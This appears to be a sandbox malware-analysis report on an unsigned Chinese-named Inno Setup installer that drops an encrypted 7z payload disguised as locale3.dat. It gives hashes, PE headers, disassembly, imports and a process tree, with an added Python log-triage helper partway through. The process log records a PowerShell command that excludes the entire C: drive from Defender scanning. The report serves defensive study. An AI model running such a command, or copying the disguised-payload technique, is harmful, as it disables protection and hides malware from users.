                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:PE32+ executable (console) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):6144
                        Entropy (8bit):4.720366600008286
                        Encrypted:false
                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):3584000
                        Entropy (8bit):7.00283805408099
                        Encrypted:false
                        SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                        MD5:4DB75814BF4A212D3AEBA5831C059402
                        SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                        SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                        SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                        Malicious:false
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:PE32+ executable (console) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):6144
                        Entropy (8bit):4.720366600008286
                        Encrypted:false
                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):3584000
                        Entropy (8bit):7.00283805408099
                        Encrypted:false
                        SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                        MD5:4DB75814BF4A212D3AEBA5831C059402
                        SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                        SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                        SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                        Malicious:false
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                        File Type:ASCII text, with CRLF, CR line terminators
                        Category:dropped
                        Size (bytes):406
                        Entropy (8bit):5.117520345541057
                        Encrypted:false
                        SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                        MD5:9200058492BCA8F9D88B4877F842C148
                        SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                        SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                        SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                        Malicious:false
                        Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
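The 7-Zip output captured above records a .dat file that is really a password-protected (7zAES) 7z archive, unpacked by a copy of 7zr.exe dropped under Program Files (x86)\Windows NT. The following triage helper is an added example, not code from the Joe Sandbox report or from the sample: it parses that log and reports the facts a triager would record. SAMPLE_LOG is reconstructed from the preview (each '..' in the preview is a CRLF line break; the ' 0M Scan' and ' 0%' progress fragments are omitted), and EXPECTED_EXT is an assumption about which extensions a legitimate archive of each type would carry.

```python
"""Triage of the 7-Zip extraction log captured from the dropped 7zr.exe.

Added example, not code from the Joe Sandbox report or from the sample.
SAMPLE_LOG is reconstructed from the report's preview of the log ('..' in the
preview is a CRLF line break; progress fragments are omitted). EXPECTED_EXT is
an assumption about which extensions a legitimate archive of each type uses.
"""
import os
import re
from dataclasses import dataclass
from typing import Optional

EXPECTED_EXT = {
    "7z": {".7z"}, "zip": {".zip"}, "gzip": {".gz", ".tgz"},
    "xz": {".xz"}, "bzip2": {".bz2"}, "tar": {".tar"}, "rar": {".rar"},
}

SAMPLE_LOG = (
    "7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20\r\n"
    "\r\n"
    "Scanning the drive for archives:\r\n"
    "1 file, 31890 bytes (32 KiB)\r\n"
    "\r\n"
    "Extracting archive: locale3.dat\r\n"
    "--\r\n"
    "Path = locale3.dat\r\n"
    "Type = 7z\r\n"
    "Physical Size = 31890\r\n"
    "Headers Size = 354\r\n"
    "Method = LZMA2:16 LZMA:16 BCJ2 7zAES\r\n"
    "Solid = -\r\n"
    "Blocks = 1\r\n"
    "\r\n"
    "Everything is Ok\r\n"
    "\r\n"
    "Size: 63640\r\n"
    "Compressed: 31890\r\n"
)


@dataclass
class ArchiveInfo:
    path: str
    archive_type: str
    methods: list
    encrypted: bool           # 7zAES / AES appears in the method chain
    extension_mismatch: bool  # file extension disagrees with the detected type
    unpacked_size: Optional[int]
    compressed_size: Optional[int]


def parse_7z_log(text: str) -> Optional[ArchiveInfo]:
    """Pull the archive properties and sizes out of 7-Zip's extraction output."""
    props, sizes = {}, {}
    for line in text.splitlines():
        m = re.match(r"^(Path|Type|Method)\s*=\s*(.*)$", line)
        if m:
            props[m.group(1)] = m.group(2).strip()
            continue
        m = re.match(r"^(Size|Compressed):\s*(\d+)\s*$", line)
        if m:
            sizes[m.group(1)] = int(m.group(2))
    if "Path" not in props or "Type" not in props:
        return None
    methods = props.get("Method", "").split()
    archive_type = props["Type"].lower()
    ext = os.path.splitext(props["Path"])[1].lower()
    expected = EXPECTED_EXT.get(archive_type)
    return ArchiveInfo(
        path=props["Path"],
        archive_type=archive_type,
        methods=methods,
        encrypted=any(m.upper().startswith(("7ZAES", "AES")) for m in methods),
        extension_mismatch=expected is not None and ext not in expected,
        unpacked_size=sizes.get("Size"),
        compressed_size=sizes.get("Compressed"),
    )


def triage(info: ArchiveInfo) -> list:
    """Findings a triager would record for this dropped archive."""
    findings = []
    if info.encrypted:
        findings.append("password-protected (7zAES): payload was unreadable to static scanners")
    if info.extension_mismatch:
        findings.append(f"extension {os.path.splitext(info.path)[1]!r} hides a {info.archive_type} archive")
    if any(m in ("BCJ", "BCJ2") for m in info.methods):
        findings.append("BCJ/BCJ2 filter present: 7-Zip applies it to x86 executable content")
    return findings


if __name__ == "__main__":
    for line in triage(parse_7z_log(SAMPLE_LOG)):
        print("-", line)
```

The encryption flag is the important one: a 7zAES archive cannot be inspected by an on-access scanner until the installer supplies the password at runtime, which is why the payload only becomes visible as a dropped file after 7zr.exe has run.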
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.920986760812326
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 98.04%
                        • Inno Setup installer (109748/4) 1.08%
                        • InstallShield setup (43055/19) 0.42%
                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                        File name:#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                        File size:5'694'753 bytes
                        MD5:44728e21199d2b04a4b25798625ac86e
                        SHA1:382e29a97bb8a34a3164f7464692f16e3526bb1c
                        SHA256:4cd9b5ec751ac76c5e71d500cd4592dbd4fc7ce4e88ea0187fbc04e66f976cc5
                        SHA512:cc8276fe2aa6e57ef9ade90f833dddcbf00b1edb952457c154666aa362fa915b4636d108e1738e420c2421456cc2f85f211eb2b350a0d6da8777f80a9009ee64
                        SSDEEP:98304:XwREBVV+Qh70jV13LgKYVR0jyaTnVWbaAzE0JVdMwZgW:lBCQ8j3LBYVavTIbaiE0JNF
                        TLSH:8D461222F2CBE43EE45D0B3B06B2A15894FB6A616522AD5786ECB4ECCF311501D3F647
                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                        Icon Hash:0c0c2d33ceec80aa
                        Entrypoint:0x4a83bc
                        Entrypoint Section:.itext
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:1
                        File Version Major:6
                        File Version Minor:1
                        Subsystem Version Major:6
                        Subsystem Version Minor:1
                        Import Hash:40ab50289f7ef5fae60801f88d4541fc
                        Instruction
                        push ebp
                        mov ebp, esp
                        add esp, FFFFFFA4h
                        push ebx
                        push esi
                        push edi
                        xor eax, eax
                        mov dword ptr [ebp-3Ch], eax
                        mov dword ptr [ebp-40h], eax
                        mov dword ptr [ebp-5Ch], eax
                        mov dword ptr [ebp-30h], eax
                        mov dword ptr [ebp-38h], eax
                        mov dword ptr [ebp-34h], eax
                        mov dword ptr [ebp-2Ch], eax
                        mov dword ptr [ebp-28h], eax
                        mov dword ptr [ebp-14h], eax
                        mov eax, 004A2EBCh
                        call 00007F8F70D3DE35h
                        xor eax, eax
                        push ebp
                        push 004A8AC1h
                        push dword ptr fs:[eax]
                        mov dword ptr fs:[eax], esp
                        xor edx, edx
                        push ebp
                        push 004A8A7Bh
                        push dword ptr fs:[edx]
                        mov dword ptr fs:[edx], esp
                        mov eax, dword ptr [004B0634h]
                        call 00007F8F70DCF7BBh
                        call 00007F8F70DCF30Eh
                        lea edx, dword ptr [ebp-14h]
                        xor eax, eax
                        call 00007F8F70DC9FE8h
                        mov edx, dword ptr [ebp-14h]
                        mov eax, 004B41F4h
                        call 00007F8F70D37EE3h
                        push 00000002h
                        push 00000000h
                        push 00000001h
                        mov ecx, dword ptr [004B41F4h]
                        mov dl, 01h
                        mov eax, dword ptr [0049CD14h]
                        call 00007F8F70DCB313h
                        mov dword ptr [004B41F8h], eax
                        xor edx, edx
                        push ebp
                        push 004A8A27h
                        push dword ptr fs:[edx]
                        mov dword ptr fs:[edx], esp
                        call 00007F8F70DCF843h
                        mov dword ptr [004B4200h], eax
                        mov eax, dword ptr [004B4200h]
                        cmp dword ptr [eax+0Ch], 01h
                        jne 00007F8F70DD652Ah
                        mov eax, dword ptr [004B4200h]
                        mov edx, 00000028h
                        call 00007F8F70DCBC08h
                        mov edx, dword ptr [004B4200h]
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        .text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        .rsrc | 0xcb000 | 0x11000 | 0x11000 | 20f7b0cee625907b1f43c38504803d33 | False | 0.18784466911764705 | data | 3.7212772086393158 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                        RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
                        RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
                        RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
                        RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
                        RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
                        RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
                        RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
                        RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
                        RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
                        RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
                        RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
                        RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
                        RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
                        RT_STRING | 0xd8e00 | 0x3f8 | data | | | 0.3198818897637795
                        RT_STRING | 0xd91f8 | 0x2dc | data | | | 0.36475409836065575
                        RT_STRING | 0xd94d4 | 0x430 | data | | | 0.40578358208955223
                        RT_STRING | 0xd9904 | 0x44c | data | | | 0.38636363636363635
                        RT_STRING | 0xd9d50 | 0x2d4 | data | | | 0.39226519337016574
                        RT_STRING | 0xda024 | 0xb8 | data | | | 0.6467391304347826
                        RT_STRING | 0xda0dc | 0x9c | data | | | 0.6410256410256411
                        RT_STRING | 0xda178 | 0x374 | data | | | 0.4230769230769231
                        RT_STRING | 0xda4ec | 0x398 | data | | | 0.3358695652173913
                        RT_STRING | 0xda884 | 0x368 | data | | | 0.3795871559633027
                        RT_STRING | 0xdabec | 0x2a4 | data | | | 0.4275147928994083
                        RT_RCDATA | 0xdae90 | 0x10 | data | | | 1.5
                        RT_RCDATA | 0xdaea0 | 0x310 | data | | | 0.6173469387755102
                        RT_RCDATA | 0xdb1b0 | 0x2c | data | | | 1.1818181818181819
                        RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
                        RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2790368271954674
                        RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                        DLL | Import
                        kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                        comctl32.dll | InitCommonControls
                        user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                        oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                        advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                        Name | Ordinal | Address
                        __dbk_fcall_wrapper | 2 | 0x40fc10
                        dbkFCallWrapperAddr | 1 | 0x4b063c
                        Language of compilation system | Country where language is spoken
                        English | United States
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Dec 22, 2024 09:45:24.388664007 CET | 1.1.1.1 | 192.168.2.4 | 0x86b3 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                        Dec 22, 2024 09:45:24.388664007 CET | 1.1.1.1 | 192.168.2.4 | 0x86b3 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false

                        Target ID:0
                        Start time:03:45:07
                        Start date:22/12/2024
                        Path:C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
                        Imagebase:0xca0000
                        File size:5'694'753 bytes
                        MD5 hash:44728E21199D2B04A4B25798625AC86E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Reputation:low
                        Has exited:true

                        Target ID:1
                        Start time:03:45:07
                        Start date:22/12/2024
                        Path:C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$20424,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
                        Imagebase:0xbe0000
                        File size:3'366'912 bytes
                        MD5 hash:CCFB5265302C0ED10D4EE3C9C00B07B1
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:2
                        Start time:03:45:08
                        Start date:22/12/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                        Imagebase:0x7ff788560000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:03:45:08
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:03:45:12
                        Start date:22/12/2024
                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Imagebase:0x7ff693ab0000
                        File size:496'640 bytes
                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:5
                        Start time:03:45:13
                        Start date:22/12/2024
                        Path:C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
                        Imagebase:0xca0000
                        File size:5'694'753 bytes
                        MD5 hash:44728E21199D2B04A4B25798625AC86E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Reputation:low
                        Has exited:false

                        Target ID:6
                        Start time:03:45:14
                        Start date:22/12/2024
                        Path:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        Wow64 process (32bit):true
